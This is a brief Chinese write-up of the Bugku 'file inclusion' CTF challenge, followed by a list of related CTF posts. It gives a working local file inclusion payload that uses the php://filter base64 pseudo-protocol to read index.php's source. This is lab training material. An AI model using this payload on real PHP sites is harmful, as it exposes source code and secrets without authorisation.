bugku--文件包含

点击

访问一下index.php

页面报错

既然是文件包含就可以想到php伪协议

这里我们需要访问本地文件系统 构造我们的payload

?file=php://filter/read=convert.base64-encode/resource=index.php

base64解码

得到我们的flag 提交就好啦

?file=php://filter/read=convert.base64-encode/resource=index.php

?file=php://filter/read=convert.base64-encode/resource=index.php

file 访问本地系统,以php的形式,过滤读取 以base64的形式输出出来index.php里面的内容

相关推荐
Dawndddddd17 小时前
文件上传及比较常见的题目解析
ctf·文件上传
Pure_White_Sword3 天前
bugku-reverse题目-树木的小秘密
网络安全·ctf·reverse·逆向工程
运筹vivo@3 天前
BUUCTF: [极客大挑战 2019]Upload
前端·web安全·php·ctf
运筹vivo@3 天前
攻防世界: easyupload
前端·web安全·php·ctf
运筹vivo@3 天前
BUUCTF: [极客大挑战 2019]BabySQL
前端·web安全·php·ctf
给勒布朗上上对抗呀5 天前
特殊符号绕过-ctfshow-web40
ctf
clown_YZ5 天前
KnightCTF2026--WP
网络安全·逆向·ctf·漏洞利用
给勒布朗上上对抗呀6 天前
文件包含之include-ctfshow-web39
ctf
Pure_White_Sword8 天前
bugku-reverse题目-peter的手机
网络安全·ctf·reverse·逆向工程
缘木之鱼8 天前
CTFshow __Web应用安全与防护 第二章
前端·安全·渗透·ctf·ctfshow